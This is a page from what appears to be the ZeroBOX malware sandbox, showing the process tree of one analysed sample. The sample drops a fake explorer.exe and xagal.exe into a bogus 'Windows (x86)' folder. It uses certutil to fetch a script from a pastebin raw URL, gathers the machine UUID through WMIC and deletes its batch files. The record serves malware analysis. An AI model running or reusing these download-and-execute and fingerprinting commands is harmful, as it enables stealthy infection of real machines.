| ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
04.20 07:04
.csrss.exe
04.20 07:04
.csrss.exe
04.20 06:04
cookies-alert-script.j...
04.20 06:04
mdb.min.css
04.20 06:04
font-awesome.min.css
04.20 06:04
bootstrap.min.css
04.20 06:04
style.css
04.20 06:04
popper.min.js.pobrane
04.20 06:04
jquery-3.2.1.min.js.po...
04.20 06:04
mdb.min.js.pobrane

Latest News
04.20 02:04
[K-CTI 2025] 엔키화이트햇 천호...
04.20 01:04
[K-CTI 2025] 안랩 김승관 부장...
04.20 12:04
[K-CTI 2025] 케이토네트웍스 "...
04.20 12:04
[K-CTI 2025] 전덕조 씨큐비스타...
04.20 11:04
Frankenflair 58: Manua...
04.20 10:04
IT Sicherheitsnews tae...
04.20 08:04
China’s TMSR-LF1 Molte...
04.20 07:04
Tiktok testet Fußnoten...
04.20 07:04
KI-Bots im Undercover-...
04.20 07:04
Entkomme der Zahlenfal...

| ZeroBOX

64a1.com "C:\Users\test22\AppData\Local\Temp\64a1.com"
2772
- xagal.exe "C:\Windows (x86)\xagal.exe"
  2976
  - cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E474.tmp\E475.bat "C:\Windows (x86)\xagal.exe""
    2076
    - certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW "C:\Windows (x86)\version.bat"
      2152
    - cmd.exe cmd /c del "C:\Windows (x86)\version.bat"
      2284
    - cmd.exe C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
      2420
      - WMIC.exe wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
        2452
    - cmd.exe C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
      2644
      - WMIC.exe wmic csproduct get UUID /format:list
        2748
      - find.exe find "="
        2996
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\run.vbs"
      2892
      - cmd.exe cmd /c ""C:\Windows (x86)\xcls.bat" "
        3060
        
        WMIC.exe wmic process where name='xagal.exe' delete
        2024
        
        explorer.exe "C:\Windows (x86)\explorer.exe"
        2184
        
        cmd.exe cmd /c del "C:\Windows (x86)\xcls.bat"
        2444

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf